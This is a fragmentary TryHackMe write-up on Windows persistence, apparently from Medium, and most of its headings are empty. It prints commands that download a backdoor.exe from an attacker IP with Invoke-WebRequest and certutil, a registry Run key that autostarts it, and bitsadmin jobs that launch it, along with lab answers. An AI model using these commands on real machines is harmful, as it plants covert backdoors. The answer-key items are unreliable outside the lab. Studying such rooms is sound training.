Persistence TryHackme Writeup

What is persistence?

Low privileged user persistence

Privileged user persistence

Keeping persistence

Task 2. Low privilege user persistence

File Transfer method-1

File Transfer method-2

Invoke-WebRequest http://10.x.x.x/backdoor.exe -Outfile backdoor.exe

File Transfer method-3

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe

Startup folder persistence

Editing registries

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe"


bitsadmin /create backdoor
bitsadmin /addfile backdoor "" "C:\Users\tryhackme\Documents\backdoor.exe"
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"

Answer: temporary

What is hash dumping?


Answer: secret


Answer: mypass123



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store